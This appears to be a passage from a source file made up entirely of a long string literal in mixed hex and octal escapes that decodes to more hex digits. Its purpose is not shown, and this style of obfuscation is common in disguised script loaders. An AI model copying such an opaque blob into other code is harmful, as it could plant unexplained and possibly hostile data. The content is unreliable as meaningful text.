64\x37\x66\x61\142\67\60\x66\x34\146\71\x64\x32\67\142\141\x66\64\65\141\x37\143\67\x62\x66\142\x32\70\67\x31\x30\64\66\x35\67\67\67\143\70\x31\x66\x65\67\x65\x61\x35\64\x39\64\x38\x34\x35\63\146\63\146\x61\x65\141\x61\x30\142\65\x62\145\71\x63\x31\144\71\142\63\x61\143\x66\x32\x65\x33\x31\60\62\x32\143\62\x32\61\x62\x64\x63\x30\x31\x61\142\142\67\x65\x35\x30\x64\70\x38\63\x33\x38\144\66\x61\x61\141\x63\x37\143\x63\x31\x62\141\x30\x39\x37\x31\x36\141\64\x39\x33\146\x30\x62\142\67\146\145\146\61\x30\61\144\x63\x66\x61\x38\64\64\144\63\x36\143\x64\63\62\x62\142\141\x38\x30\x39\x64\63\x32\62\146\61\x62\x63\x61\63\x65\146\x39\141\60\x34\66\141\145\63\144\x31\x33\x33\x64\x64\x62\x64\66\x32\x31\61\x30\x38\x36\x64\67\141\146\x39\144\71\65\145\142\x62\62\x61\x62\x30\x64\x36\x33\60\x66\141\71\x33\x36\x31\x32\x64\67\62\66\x35\67\145\66\65\64\66\x39\x32\x66\141\67\x37\62\146\142\x35\x35\145\x63\x30\60\x62\62\61\61\x36\66\x34\142\61\146\x33\x38\71\x35\143\145\x64\x62\63\64\145\x34\61\142\65\144\146\144\142\x64\x39\x39\x64\141\x64\142\63\145\x38\x34\145\146\67\x65\x64\65\65\60\64\x66\x36\66\x36\x32\x37\x61\70\143\145\x34\x37\67\x64\x62\x63\62\60\x62\145\x61\64\65\x33\x36\x32\62\142\x34\63\x38\71\x61\x30\60\66\60\66\71\x34\x65\60\x31\66\x30\62\63\146\144\x66\x62\60\63\142\65\x66\71\x33\x63\143\x35\67\63\x62\67\145\64\145\x32\x66\146\141\146\143\64\x30\65\x31\x63\70\x66\67\x34\144\x38\145\146\x39\70\63\66\x36\141\x37\142\x37\144\x32\141\x62\x36\x37\62\x36\71\66\63\145\x64\x35\x31\x36\x35\144\x31\145\65\144\x66\65\x63\60\67\142\x37\67\60\x61\x66\x32\67\x34\x66\142\141\143\x31\x61\x65\x38\x36\x38\64\65\144\142\71\70\x63\61\x64\x37\x35\x65\x62\60\65\x62\x66\64\x33\141\x39\x32\66\65\x36\67\61\x35\141\61\x36\x39\x35\x36\62\142\142\x30\x30\x34\x62\x61\62\x63\145\x62\x34\x34\x35\x31\67\66\x65\x39\61\146\x63\61\x39\63\x34\62\x36\x62\70\143\x37\67\63\x66\61\67\x62\141\x35\x65\145\64\x65\x32\62\65\x61\67\x64\67\x37\x37\60\62\142\142\x30\x39\146\x36\x63\x65\61\66\142\x61\x37\60\144\146\x31\x39\x62\x63\145\65\142\67\146\61\x33\x30\60\x30\x39\144\x37\63\x30\64\64\x61\x34\x62\x63\142\x37\67\x62\71\70\x66\x34\61\65\x63\67\x34\x65\67\x31\x38\65\145\67\145\x36\65\x39\144\67\x62\61\141\x36\x36\145\67\x62\62\x30\x39\60\141\70\144\63\x38\x33\143\66\x34\67\146\x34\x64\x36\x37\142\146\x32\x30\145\62\142\x61\x36\x39\146\61\x33\64\x61\x35\x30\x66\66\145\64\66\141\65\64\x64\x38\x36\x32\62\62\x33\63\x33\65\x30\x31\70\x30\67\x61\x61\70\71\x61\143\x38\x65\64\x65\x33\x32\144\143\144\x36\x33\x63\x66\61\x34\x38\62\144\141\66\x65\63\x39\x34\x35\x36\x39\x37\61\141\x37\x34\67\64\66\145\x64\144\x62\67\x38\x38\71\x38\x32\x30\65\71\144\71\145\x30\66\x61\x33\65\145\142\144\x61\62\67\146\x32\x66\x35\x62\x30\60\67\x30\x36\65\x36\61\x66\x33\x35\x37\145\145\x64\64\65\x37\x64\x63\x37\62\71\144\71\71\64\x33\x62\x37\x61\60\x62\x34\64\x30\x32\63\63\x31\71\63\146\x35\x36\x30\67\146\142\x63\61\x63\146\x38\145\67\144\x36\x39\x65\x32\143\x33\x37\67\x61\65\145\x65\x65\x31\66\66\60\66\66\67\x61\62\x35\x36\65\146\144\x37\x63\141\x30\x30\x32\x63\71\x64\142\x34\65\62\67\145\x34\146\x30\67\146\x36\141\142\x34\60\x32\62\x37\x65\x63\x66\65\146\64\70\143\60\60\x36\x34\71\x61\145\x62\143\64\x36\x33\x39\x36\x37\x31\x36\64\x30\143\141\142\x65\144\x66\64\x35\x39\x31\141\x66\146\145\62\62\60\60\63\67\x64\x30\x63\70\63\65\64\x38\65\60\x31\60\x37\61\x36\x31\x62\x61\x39\x61\x33\67\142\65\63\143\x35\71\67\x36\64\61\x63\x63\x39\x66\61\x66\146\63\65\x63\x63\x30\62\x65\63\x63\62\x61\x31\x66\63\66\66\61\x33\x64\67\x36\x65\142\141\63\142\62\x64\x33\142\x36\146\67\145\x32\62\x31\66\146\x65\x61\x33\x38\60\x33\141\x33\67\64\70\x62\x65\x38\x36\60\145\x65\66\x61\64\64\x30\141\x30\61\x36\x39\63\x30\60\x33\71\145\142\x62\x64\62\x63\x33\63\63\66\144\x61\141\x65\x62\x61\x66\63\61\141\x36\x38\x34\x66\60\66\x36\71\61\62\60\61\x65\70\144\x63\63\60\143\66\144\144\65\70\x62\x61\64\60\x37\x37\142\143\x34\144\x30\x30\60\64\x32\x37\142\71\64\x39\146\143\x32\x62\x39\x63\62\x32\x61\143\146\64\71\x63\64\70\x62\x33\x37\x64\x62\142\x34\x64\x66\x31\x39\x31\x64\x36\67\x30\x39\x34\x38\63\x37\x62\64\145\x32\64\141\146\63\145\x65\x34\64\x39\60\66\143\144\x64\x62\x39\x61\x37\145\60\x38\71\x39\x65\71\x36\62\66\146\71\60\x38\x35\x63\x61\x33\146\143\x33\71\142\67\67\141\141\70\x32\142\64\146\x38\x35\x32\64\x37\x31\63\x65\64\141\x31\64\x63\x63\x39\63\70\x37\146\67\143\70\70\60\x37\x39\x36\145\x64\62\x64\70\71\x65\146\66\x32\x32\66\71\71\x34\61\x37\67\65\60\x38\142\x31\60\143\x61\x64\x32\x35\65\x62\x32\x64\145\x61\x35\62\x35\x37\61\60\64\x64\x64\x31\x37\x35\x61\71\70\66\62\143\66\x30\x33\143\60\70\x30\x39\x36\x35\x63\x35\x30\x35\x34\x36\60\x30\144\64\x36\143\141\144\144\71\145\143\70\x37\142\x62\142\141\144\x38\x64\64\141\71\x62\x39\70\67\x62\67\144\x38\x35\x61\x63\141\143\144\141\x63\142\x33\x30\x37\62\x39\63\62\x36\70\x39\x33\x65\145\x36\x62\x63\141\63\x65\x39\141\145\145\62\x39\x63\x65\146\x63\61\66\x32\x30\x64\x36\66\x36\x62\141\x61\x66\x32\146\x61\x33\x65\x66\x63\63\x33\142\71\x61\60\x66\x32\144\x62\x36\x31\x66\x62\65\60\141\141\70\71\144\66\x62\x65\x33\x33\x38\61\143\x39\x31\145\x31\x63\143\63\67\146\61\x35\x62\x33\61\142\142\x33\143\x37\143\60\x64\141\64\x66\x64\145\x30\x38\66\x35\x64\x33\x66\146\62\x63\x39\67\65\70\70\x34\143\x64\x35\x61\x30\146\142\x39\x39\x36\x33\62\70\x61\x37\70\x38\67\x31\x30\x38\145\x62\x37\141\x33\145\x34\141\x38\142\146\144\66\141\x66\x62\141\x35\x61\60\x62\67\66\65\60\61\60\x33\64\63\x66\64\66\x35\x30\x34\70\146\x36\x63\67\x39\x62\x63\x34\64\142\x63\x37\x33\x61\x36\x36\x31\145\141\60\x36\x32\x34\x62\x66\x62\x30\x61\x65\x32\66\x39\60\63\60\x34\x39\x33\x66\141\x62\x38\146\141\x37\142\63\71\x65\x31\63\63\142\60\64\67\x63\x32\x38\141\60\143\145\x33\x66\71\70\x63\x62\x31\x36\143\x63\65\x33\66\x37\65\66\60\61\63\63\x35\60\60\142\x39\144\65\x30\65\66\64\141\146\x33\x30\x32\145\x37\141\144\65\x36\60\x34\x64\141\x62\x39\145\x36\66\63\x62\144\x61\65\x63\x65\x66\66\x32\x30\63\63\x63\x37\x33\63\x35\63\x63\x61\x39\71\x36\63\x37\65\61\x35\142\141\x65\x66\x65\x34\x36\x35\65\x34\146\146\x66\62\64\144\63\62\x36\x39\67\67\66\143\x65\x30\142\x63\142\x62\67\64\x38\141\61\62\x61\65\x37\x62\144\65\x34\61\x62\x65\x64\x32\x65\x62\x65\x30\x38\65\x64\146\x36\x62\141\64\x63\x32\x64\x64\70\x35\x32\x61\x32\x32\x32\141\146\70\x64\61\x37\x39\141\x30\65\x34\143\141\67\x37\x39\67\61\x30\145\x34\x38\143\x62\x39\142\x38\x31\x31\145\x35\143\x35\70\x37\x37\x64\x64\x66\x32\x38\x62\145\64\60\x63\x30\70\x63\65\x33\142\144\64\63\x62\60\x39\x66\x36\64\x36\63\x36\145\x36\x66\62\70\x38\144\64\x38\x63\141\x64\x65\x61\65\145\60\x30\x63\71\70\x66\67\141\x32\70\66\x33\64\64\x34\x65\x37\x37\60\66\61\x33\63\146\x35\145\x33\63\x65\x36\x63\x30\x66\144\x37\x66\60\x32\71\62\65\x61\67\66\x38\x63\x65\x35\67\x61\x62\61\x62\66\146\x66\143\142\64\66\x31\142\143\x39\71\x38\x61\x30\x62\64\61\70\146\71\x37\x36\x30\x61\x63\66\x38\61\x33\x61\61\x38\62\x63\70\x32\x66\x30\x64\x34\x36\x62\x38\x65\141\61\x39\64\x37\x65\x39\66\x38\x38\x65\x64\63\x36\x61\70\x37\143\x31\65\x33\60\146\144\71\x31\x31\70\x64\60\x34\65\143\x64\141\145\x31\64\x66\143\x38\x61\71\67\141\x32\x64\x62\70\x35\x66\x63\141\141\64\x37\x65\63\x66\60\65\x36\x30\x34\x33\63\x33\x61\63\66\61\x64\x64\144\141\x33\62\145\x65\x65\x65\x38\60\x32\142\60\x63\67\142\64\143\146\x33\65\145\x33\x37\x64\145\146\64\x33\x61\62\71\x62\x63\143\142\x31\x35\x65\62\x36\63\63\61\x36\x34\64\60\142\x34\x36\x33\x30\x38\x35\x33\x38\x34\71\x66\x39\x61\65\143\62\x63\62\70\x61\67\142\143\x33\71\x36\x36\141\x65\62\62\x64\141\145\x65\66\x37\x66\x62\x65\62\141\x31\x63\141\x31\x64\x36\x39\142\x30\x38\143\144\145\145\x39\65\x33\x62\x39\x61\145\142\x35\62\x38\x61\63\x38\x65\x64\x38\65\66\x35\x31\x62\61\65\63\66\x33\63\64\146\144\146\x62\x36\143\64\146\143\67\x66\x65\70\x36\146\x30\61\x38\67\142\67\67\x66\x30\x64\66\70\x62\62\x34\x39\x38\x66\66\61\x34\62\70\62\144\x36\142\x38\x35\x34\62\66\70\x30\145\146\x61\141\x35\x36\x31\x31\146\x65\x39\x33\x65\x65\70\x32\62\63\66\144\61\146\x33\x63\66\64\71\x37\71\144\64\144\141\65\x34\x62\65\65\x36\61\x33\146\x31\x38\144\x62\x38\x65\x30\64\61\60\141\x64\x37\x33\64\66\143\x32\x37\145\62\146\65\x32\x33\x66\63\x34\x37\146\x37\146\65\x64\x36\x66\143\x34\70\71\x35\x62\146\x37\x64\144\66\71\x36\x39\x66\x30\145\67\x32\x34\145\x37\65\145\x35\61\66\62\x30\x37\71\64\x39\x33\144\x32\143\60\60\x34\67\x38\x66\141\x61\x34\144\142\x66\x61\x62\63\144\66\65\x61\x66\66\x62\x39\144\64\65\71\141\145\63\x31\x30\143\144\144\144\64\x35\x33\67\61\x37\71\62\x37\x36\x36\145\x66\67\x37\x37\142\x63\61\x65\145\61\x63\x66\64\146\x65\143\145\x33\70\70\70\60\x38\66\65\x33\60\60\141\66\x38\70\x38\x64\x35\65\63\62\x38\62\x37\66\x36\62\x39\x36\60\70\x63\x35\x61\x64\x34\x66\x31\x30\141\61\63\x35\x38\60\70\x65\64\63\x34\x39\x33\67\x35\143\x64\64\145\61\65\144\x38\64\62\x36\x38\144\x37\x39\67\x61\x34\x62\71\63\x36\x62\x62\144\141\x65\142\70\x33\143\x36\x63\63\144\x32\61\70\61\x34\144\x37\70\x36\71\70\67\63\146\x65\64\66\145\66\65\60\x64\145\66\141\142\67\143\x32\x32\146\x63\142\x35\145\70\x36\146\65\x39\61\146\x61\65\x37\x31\x34\x66\63\144\x30\x64\x36\x66\x63\145\67\x34\141\143\x34\70\x64\x36\x63\145\x61\x30\x37\145\x64\70\x33\144\x39\x66\x35\x39\145\141\67\144\142\x65\x38\62\65\67\x39\143\x37\146\x65\x65\61\x34\65\67\x32\x64\70\62\65\x31\145\67\x36\x32\64\146\66\x35\63\x66\x33\x65\60\x38\141\x39\x35\71\x31\x62\70\x30\x34\x66\66\x35\x39\63\66\144\x65\142\61\141\142\66\62\63\61\145\x34\62\144\65\64\x66\146\70\x34\x34\60\x66\x32\60\x62\66\x36\x31\63\x33\x30\67\x62\x65\66\x64\x63\142\x62\x63\145\x30\x31\70\61\x37\61\x35\64\71\x36\61\x65\x66\146\66\146\142\x34\144\64\x64\62\142\145\62\x62\x37\70\60\x38\x61\60\x39\60\66\64\144\144\61\x34\71\x32\x34\x32\67\x31\64\x33\x36\62\65\145\x35\x66\x62\71\x39\60\x39\x31\x66\146\x32\x64\x66\146\62\x63\66\61\x63\70\x62\x30\x31\x64\x62\x30\x36\70\64\144\x30\145\141\x63\143\65\65\x38\x37\x65\143\65\64\x61\64\141\x33\141\66\x32\67\143\x32\x61\71\x66\x30\146\x32\x31\145\x63\x34\67\146\x66\61\x62\x30\x38\64\142\x61\144\65\61\71\71\x31\x36\x39\x64\64\145\x33\x62\145\x35\x38\67\143\64\141\x37\60\x62\146\144\x66\144\66\x33\142\145\x64\x62\x38\142\70\71\70\x62\141\x37\144\x34\63\65\x32\143\141\x38\66\141\61\x30\143\144\65\65\x31\61\143\x31\141\x35\70\x65\63\x34\x32\x36\x36\143\x31\67\x38\143\66\145\143\x38\x30\x35\x39\x36\x63\x36\x31\x64\64\x33\70\x61\142\x37\x37\64\62\70\70\x30\x66\x64\x62\145\63\66\x37\x61\143\x35\x34\70\x34\x63\x65\67\62\x34\x38\x31\70\x34\x37\67\x32\x37\63\x34\142\x32\x65\x37\x32\x38\65\x33\x30\67\146\x34\x61\x31\142\x64\x36\141\67\x63\65\144\x65\x34\x38\x62\x66\60\x64\x64\141\x65\65\64\66\66\61\64\71\x36\146\145\x38\71\x64\x63\x36\x34\142\63\66\x37\x32\64\x64\143\x31\141\x63\65\x66\x31\x39\67\70\66\x36\63\x61\x66\x37\144\143\141\x38\x62\67\141\144\x62\x65\67\66\x65\x61\144\x63\67\143\145\x66\146\142\62\61\70\x33\x33\146\63\146\x36\65\x35\x35\66\64\62\144\142\x31\x30\144\x61\x66\142\x32\x66\x62\x38\x63\x36\63\60\x63\64\61\x35\141\x34\x34\x62\x31\61\x33\71\141\142\x61\141\146\x63\x63\63\66\64\x34\143\x35\141\x61\x30\143\x66\x34\x64\x31\61\143\144\x66\70\65\65\61\x38\145\61\x62\x64\x36\x38\x66\71\60\x65\x39\x66\x61\142\66\60\146\66\65\144\x34\146\71\144\66\x36\70\x64\66\x65\x32\60\65\64\x36\x64\x38\x32\66\x39\141\x35\x33\x34\143\64\x63\63\143\144\x30\146\145\x33\x35\x64\x63\x38\x37\60\x31\x32\x30\x63\141\x34\145\x63\64\145\143\x33\x39\61\x36\x35\144\61\x30\x36\64\x66\143\60\142\x33\146\x36\x33\x65\x35\144\x65\66\x63\x39\71\x30\x35\64\x36\x61\62\x31\143\71\141\x65\146\x34\x33\66\x62\63\x62\146\x34\x38\65\141\143\145\145\146\145\x39\x31\63\62\145\x62\x32\x35\x39\x38\63\141\x36\x64\60\141\x65\x39\x38\144\x65\146\x32\60\x37\60\x65\x33\x32\60\143\145\x36\62\x37\70\70\144\x61\x31\x65\x62\146\x64\60\64\141\141\x66\71\x65\66\x33\x35\143\x61\67\145\141\x61\141\142\x62\60\67\144\x34\x66\62\x31\x66\x37\x38\67\x65\146\62\x33\62\x64\x39\63\71\x37\x63\70\63\141\x30\x66\66\65\62\x66\x66\x37\142\67\66\x33\x61\x62\64\141\64\x34\x35\x35\63\70\71\x61\63\60\x61\x34\x36\63\66\143\x38\x30\x35\x32\x38\66\142\62\63\144\145\146\145\144\x66\67\142\x35\70\66\65\x36\x61\63\61\x30\141\65\x62\61\x64\142\143\x34\63\141\63\x62\63\x37\x35\61\70\65\x35\x31\x37\143\63\x63\65\141\x32\71\70\x37\x37\x31\x65\145\66\x64\x66\x63\146\x63\x37\x63\64\145\x65\65\65\x64\62\143\x35\x65\145\144\x30\x30\143\x30\67\x37\x66\143\x37\145\67\x36\x36\x62\61\x66\144\x34\67\x39\145\x33\x32\x33\71\63\x32\x36\62\71\x63\61\145\x39\x63\142\62\66\x61\61\x39\60\144\60\60\x35\70\x38\x64\66\x38\x38\x34\67\x33\x66\63\71\x35\65\x37\x62\143\142\x36\141\67\66\x39\63\65\x38\66\144\63\x32\66\x36\142\x34\70\x38\70\145\141\x65\x66\145\x63\143\x31\x66\x65\71\x33\145\66\65\x64\141\x65\x64\63\x30\x36\x33\x38\66\67\146\67\145\70\x63\63\144\x62\x62\x64\65\x33\x33\142\x38\x35\x35\x61\x34\x35\x37\141\x35\146\x37\141\x33\x39\146\60\x63\141\60\x35\64\70\x66\145\x62\x64\61\x30\141\x65\x33\142\x62\65\x32\63\x65\145\63\64\x62\142\x39\142\146\x64\x33\x32\70\x37\63\x65\66\x35\144\x30\66\x38\x33\x30\143\142\66\62\x66\x66\x64\144\x35\x34\x39\71\x64\x37\144\71\144\x36\67\x64\x64\x32\x66\65\x33\65\146\x61\66\63\63\63\x38\142\144\62\x36\70\x37\x37\x61\x30\x34\65\x31\x38\61\x65\x32\x33\65\146\60\146\63\145\x33\x63\x33\146\142\x37\x34\143\x31\x30\x63\71\x65\70\146\x64\x33\x38\67\x66\142\71\145\x33\64\67\70\65\x30\143\62\x30\67\71\x66\63\x37\x36\x36\x31\144\x65\x63\143\x39\x65\67\x36\65\61\x34\146\x31\67\x38\x39\x63\x66\x32\65\144\x61\x62\67\x39\x37\x33\64\x62\x64\141\x65\67\x37\x37\x62\67\142\x61\141\x37\x66\143\70\66\65\x61\71\71\x38\144\x37\x32\66\145\67\71\142\144\143\144\62\x32\62\65\x65\144\145\63\x62\65\x65\x37\x39\71\x35\x61\x34\71\61\63\x66\71\141\x63\x39\141\145\x31\141\x30\x38\144\62\64\61\64\146\x66\x34\x33\67\62\x61\70\142\63\71\x65\x66\141\x39\65\64\144\145\x36\143\x37\145\63\x62\x34\145\143\60\x63\62\x38\66\x65\x33\60\x33\71\61\x37\x37\x62\62\65\60\x33\65\x35\62\x62\60\71\146\x39\x37\x39\71\x39\x63\64\x39\62\x35\x39\x64\65\x35\x63\x31\60\x33\x39\x35\x34\x34\x32\60\146\x37\146\71\x36\x65\70\x61\61\x30\x39\x32\x62\143\61\63\x30\x62\x64\x30\x34\x38\64\x37\x62\66\146\x61\70\x64\144\x65\x61\143\x31\143\x37\x32\66\x30\71\60\x36\x37\66\144\143\x34\x32\64\x33\60\142\x62\66\x62\62\x36\x65\x31\67\142\70\x38\66\142\64\141\146\x64\60\144\66\x66\145\x32\65\70\146\x65\70\x37\66\x34\x35\142\x65\71\66\144\141\60\65\x35\x33\65\61\71\x64\x32\70\70\x64\x35\67\x34\x64\x64\146\71\x63\141\x31\x66\142\63\x33\66\x37\x34\x37\x33\x35\x62\66\63\65\60\x31\x61\x62\67\x62\141\x66\x65\x61\x63\142\70\63\141\66\x32\60\143\x61\x31\x65\60\x30\144\143\x65\70\x35\63\x36\67\61\x32\65\x39\64\61\143\x31\x31\145\x37\x65\x32\x38\145\64\60\142\61\x61\63\x36\x35\144\x66\143\x37\x65\143\x62\x62\x63\x35\x63\x64\x65\x65\66\x37\x37\63\66\x36\x34\67\146\71\64\143\x65\144\65\67\71\60\x32\67\x61\x30\141\x36\63\x65\145\60\63\66\x38\x37\67\62\x64\60\60\x30\x35\143\144\x61\66\141\145\x37\x63\x31\62\x63\71\143\60\x37\x38\71\x61\144\61\x38\61\x63\x36\x33\141\141\143\x34\x37\x30\143\144\62\x66\x36\143\67\x38\61\142\70\x61\x65\x64\66\61\145\64\145\x32\x31\x32\146\x63\x37\x32\x61\x64\67\64\x30\x39\x63\60\x61\x38\65\67\141\x38\142\60\x62\x65\65\60\x31\146\x36\x61\141\x35\141\x38\70\145\144\x64\142\61\x35\x32\143\71\146\71\x66\141\x64\x39\x32\142\x63\142\141\143\66\64\x31\x62\x37\66\x63\144\64\x64\x36\x32\x39\143\x34\143\145\x39\x65\x35\61\x62\142\x35\70\x64\x32\x63\61\145\63\x61\63\x64\62\63\x66\61\60\x66\x36\x30\65\66\145\63\x33\x33\x32\61\x65\x32\x32\x32\x34\66\x34\x39\143\x62\x65\x31\146\64\146\x31\x36\66\66\63\x39\60\x62\x64\x38\x35\x35\64\x62\61\x61\144\x61\141\x35\60\x33\x36\x66\70\60\x39\x36\60\65\x37\64\x38\x31\x65\x36\x38\67\x30\x39\70\x39\65\61\142\62\143\141\x63\65\x36\145\67\70\x32\141\144\x62\x64\x62\x65\x62\x36\142\60\144\x38\141\x35\x64\x63\65\x62\71\x33\70\67\62\x33\x39\x64\x63\65\x61\143\60\x37\64\142\144\142\62\70\67\x66\x38\x63\145\144\61\x30\71\x31\61\145\71\x30\142\67\142\x37\x64\145\x38\x33\x34\x36\x31\x65\142\x62\x64\146\x62\142\144\x36\x66\145\146\x63\71\142\x65\141\x66\60\x34\145\142\x39\70\65\141\x32\146\71\60\146\60\60\x31\x64\70\x39\x37\60\x33\x62\144\x31\x35\x62\x62\67\x61\66\61\x65\60\x63\64\x63\x32\146\71\64\145\x30\141\64\x34\62\x30\65\63\143\65\x61\x39\x63\143\x66\x30\60\67\143\65\146\65\70\x63\71\x35\143\x66\x61\x66\62\x34\x36\x66\x35\64\x61\63\63\146\x33\63\61\x62\64\70\x34\66\x38\70\x65\71\145\x35\144\x33\x32\144\x31\67\x38\x66\x36\60\62\x33\x63\142\x33\x66\x36\x63\x34\146\141\60\143\71\x66\67\x31\70\x62\x33\x32\x62\x61\145\x34\66\145\x35\x61\x39\x38\142\x63\66\x63\60\x62\71\x34\142\67\60\64\65\x65\71\x63\x37\144\60\x39\x37\60\143\71\63\71\x65\x37\x39\141\63\x66\62\64\67\145\x61\x66\x30\x35\141\x38\x33\x62\146\x64\x36\146\x35\63\x61\x63\71\70\x32\x37\146\x63\144\x66\144\146\x31\x34\x36\x37\x61\67\61\60\66\x34\145\x61\x64\62\142\64\144\x39\141\144\x65\71\x30\x37\143\142\x33\144\144\x33\x30\x61\x63\145\141\x64\x62\67\x66\x61\141\x34\x32\x39\146\146\65\145\x33\x37\x38\x33\61\143\145\x66\x38\65\64\x34\62\146\x34\x37\62\x36\x33\x38\x35\x37\67\146\67\x36\62\x37\64\65\x37\x61\64\63\66\64\141\145\x34\63\144\67\x62\x30\x37\61\71\x32\x63\x30\x61\64\x63\67\x32\66\146\142\x64\65\x66\x63\145\146\x38\62\145\x32\x64\x33\x66\60\x38\61\x62\x30\60\x65\x64\61\141\x38\65\146\71\x64\62\64\144\x35\x31\x63\x31\x39\145\71\146\x34\141\x35\71\144\x34\x33\x65\67\x35\141\x65\67\x38\x32\67\146\x37\x38\63\x38\x66\x63\64\71\144\x35\x62\64\141\x62\67\x65\143\x38\x30\x61\67\x65\66\144\x36\61\67\x61\146\x30\145\x62\x31\x38\67\61\146\x34\62\64\63\x30\x65\145\141\x37\x30\x39\146\70\x36\x30\x30\65\x38\146\64\143\x65\62\143\61\x33\x31\x38\x35\67\x36\x33\x39\x31\70\145\x39\x33\x65\141\x66\64\144\x64\62\x30\146\61\63\x63\61\143\x30\x61\71\143\62\66\x65\145\x39\x37\x39\142\63\x36\71\146\x35\144\x39\62\x66\x33\143\145\64\x35\x30\x62\x36\x37\63\61\144\x61\60\x37\61\146\x61\61\146\x64\60\x32\x38\x63\x33\x38\70\64\x31\x62\x63\142\141\x39\144\x32\142\x37\x36\x65\64\63\65\60\60\65\144\x33\x65\141\62\x35\x63\66\x31\x62\70\x65\71\x66\x66\x65\x39\142\142\x39\x37\61\x36\x37\x38\142\x32\x61\x30\61\x31\x36\71\61\64\x66\x65\63\x31\143\x36\x66\x63\63\x65\63\x63\x66\66\x36\x37\x39\143\x66\70\65\x63\x34\145\63\141\x31\67\x66\x34\71\x32\65\x31\x66\x36\x64\x64\x32\60\x32\x64\x66\x36\71\x31\x63\x34\71\x30\62\146\61\x38\61\x31\145\143\146\143\x34\62\x37\x30\x32\63\145\64\x35\71\71\x32\141\x64\146\x37\71\x34\146\x62\x66\x39\x64\141\61\x64\x63\60\143\x32\143\142\63\x32\x38\142\142\x62\141\x62\145\x62\x33\x31\146\x64\143\x61\61\60\71\x35\x66\x32\x33\144\x35\x38\x30\x66\x65\x38\67\145\66\x33\x33\142\x36\x65\60\x34\62\64\x64\60\143\143\71\71\x37\70\x30\62\70\x32\x63\x31\71\63\x37\x61\x31\64\x31\71\64\x31\x63\146\x32\141\71\145\x65\x61\x65\x63\x65\60\60\x34\62\65\71\x30\66\x61\x36\61\x31\x37\x65\67\145\60\x65\142\65\144\142\63\x30\145\70\145\x34\x66\142\x30\x39\x63\x65\x33\x63\x66\66\60\x39\x37\x30\142\62\x61\64\65\141\x37\144\71\142\x39\x66\143\x32\x34\62\x38\x66\64\70\67\x32\62\x34\144\64\x65\x61\143\x38\66\x31\x35\x63\x62\x34\64\142\141\60\61\141\x63\x63\64\x33\x32\x62\x64\144\x63\x30\x34\146\x30\146\x32\x65\143\x36\141\70\x36\146\144\144\x62\143\67\70\64\145\x37\x31\x34\141\x62\145\x64\x63\x39\64\x66\67\x66\142\71\x33\70\x32\x64\x61\67\141\x61\62\x62\x66\65\x35\x34\x31\x36\70\x33\x62\x35\144\x32\x63\x61\71\61\x64\x65\x62\145\x39\x64\x34\x38\x63\70\62\61\60\x61\x33\x34\62\x61\60\67\x62\64\145\142\145\66\x36\71\146\x34\142\x33\141\x63\x30\144\62\x34\143\70\143\x63\71\66\x63\x61\x31\x32\x30\64\146\x64\61\x39\x35\145\65\x63\146\x37\x37\62\x35\x34\145\141\x31\x31\61\x31\x33\70\x33\x66\x63\x36\x64\x33\70\67\x33\71\70\71\x30\x32\146\x30\61\66\x33\66\60\x65\61\146\x32\x64\144\x35\x38\x33\66\64\142\x66\x66\x66\63\63\x33\62\62\x66\65\142\66\143\142\143\66\63\144\146\x65\x64\145\144\61\64\67\67\x65\x63\x63\x33\x32\x36\x62\x38\61\145\x64\x66\62\146\x37\x33\x30\143\x33\63\63\145\71\143\141\146\61\63\70\x39\x32\60\146\x31\143\x32\71\66\x36\60\x64\x66\x36\146\63\x32\146\x35\x38\67\x37\60\144\x36\145\142\64\x61\x63\67\141\x37\70\x39\65\144\x34\61\142\66\x64\144\x66\70\x34\70\x30\x65\x32\60\x32\142\70\x61\x34\142\144\x38\146\70\66\x30\x38\x66\x63\x31\x61\70\x36\x31\145\63\x35\146\143\61\66\x64\x62\64\60\x62\x35\x61\142\143\66\145\65\65\145\x63\x31\61\61\67\64\x31\67\x32\71\70\x65\70\61\70\x37\66\x63\x64\x31\x38\144\x31\60\61\x64\x65\x30\63\70\x61\x39\x62\x33\x66\64\x34\62\x34\x36\x37\x36\71\x36\64\65\x62\x34\x30\141\x61\x65\142\x62\x31\x34\x36\x37\64\66\141\144\x38\146\x37\145\67\71\70\x64\x37\x39\x34\x64\x31\x66\71\67\x37\x61\63\x39\66\x36\60\71\67\x66\x36\x64\x32\71\63\63\145\x39\145\x31\x31\x65\141\x36\66\67\x63\x34\x62\65\x30\142\x64\146\x33\x34\x61\61\62\62\144\x66\x31\63\x62\62\65\x64\64\61\x38\x37\65\x37\66\x63\64\x30\x37\x38\142\67\x38\70\66\x62\144\141\x61\141\142\x66\x66\143\x37\x62\64\144\x61\x63\x33\60\66\x31\65\x37\x61\60\71\70\x64\60\63\x36\x65\63\x63\146\x31\60\x61\61\x32\x38\x61\66\x38\x63\x34\x32\145\x31\x63\x35\146\x33\x33\145\142\144\141\145\x31\60\142\141\x31\63\x39\x63\61\143\144\x63\x32\142\x32\70\x38\x38\x30\x34\67\x35\144\143\x31\144\146\x65\x36\60\142\70\x39\x64\x38\67\60\x62\x31\x31\x62\71\x38\67\x36\141\x30\144\61\x33\x35\x63\145\141\146\x63\x30\66\66\x61\66\x33\x62\x63\141\x32\x30\x61\146\64\146\x36\145\61\x63\x36\x35\146\x31\x66\141\71\x34\142\x65\141\70\x30\60\143\x65\x63\62\x63\144\x65\146\x38\144\x33\60\x62\71\x34\x33\146\x36\x36\x63\x61\63\145\141\63\63\x33\71\x61\146\66\x32\145\x35\x34\x39\65\144\71\x61\145\60\x66\x31\66\67\x65\x62\66\60\71\146\x63\x34\145\64\71\x66\143\64\145\141\x63\144\146\x66\x62\x32\x39\x61\64\62\61\60\146\x30\65\64\x63\143\x32\141\60\62\67\x61\x61\65\141\66\x38\x62\x38\x39\x36\x33\x32\66\61\x64\61\142\67\145\x34\63\x65\x36\x35\x39\143\143\145\60\63\143\x32\61\71\x64\66\143\x65\62\x34\x35\65\144\65\x63\x62\144\60\141\145\x35\x65\x33\65\61\62\x37\x33\65\67\x33\60\x63\65\61\x64\x39\x30\70\143\x32\x39\67\145\x39\63\x65\x36\61\141\x39\x33\65\x37\x39\x32\65\x61\146\60\x62\x38\64\x37\x33\x66\71\67\x35\67\x66\x64\64\66\x38\x66\x62\x30\62\60\64\65\x64\x35\x61\67\66\65\145\142\143\70\146\x30\142\141\x38\x35\142\65\61\x31\67\x66\144\x38\x37\x30\144\142\x64\x64\x64\146\x37\142\65\143\x64\x37\x36\x66\x35\x38\x30\x36\x63\62\64\67\146\143\x34\145\64\x62\64\x66\66\x65\141\x61\x62\x64\65\67\62\x30\x66\146\61\71\x65\146\x61\x38\66\143\62\x32\62\x33\x33\142\67\71\x31\142\x35\x61\x33\x37